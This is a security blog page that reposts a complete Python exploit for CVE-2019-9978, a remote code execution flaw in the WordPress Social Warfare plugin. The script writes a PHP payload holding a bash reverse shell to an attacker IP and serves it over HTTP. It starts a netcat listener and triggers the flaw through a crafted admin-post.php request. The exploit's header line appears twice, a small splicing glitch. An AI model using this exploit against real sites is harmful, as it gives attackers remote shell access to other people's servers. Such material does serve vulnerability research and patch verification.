Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

WordPress Social Warfare 3.5.2 Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 62
#!/usr/bin/env python3
#
#*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare #!/usr/bin/env python3
#
#*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)
#*Date*: 2025-05-20
#*Exploit Author*: Huseyin Mardinli
#*Vendor Homepage*: https://warfareplugins.com/
#*Software Link*: https://wordpress.org/plugins/social-warfare/
#*Version*: <= 3.5.2
#*Tested on*: Apache, Ubuntu 20.04
#*CVE*: CVE-2019-9978
#
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time

# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130" # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4444
PAYLOAD_FILE = "payload.txt"


def create_payload():
"""Write exact reverse shell payload using valid PHP syntax"""
payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
with open(PAYLOAD_FILE, "w") as f:
f.write(payload)
print(f"[+] Payload written to {PAYLOAD_FILE}")


def start_http_server():
"""Serve payload over HTTP"""
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
print(f"[+] HTTP server running at port {HTTP_PORT}")
httpd.serve_forever()


def start_listener():
"""Start Netcat listener"""
print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])


def send_exploit():
"""Trigger the exploit with vulnerable parameter"""
payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
print(f"[+] Sending exploit: {exploit}")
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass


def main():
create_payload()

# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start

# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)

# Send the malicious request
send_exploit()


if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("[-] Interrupted by user.")
Social Media Share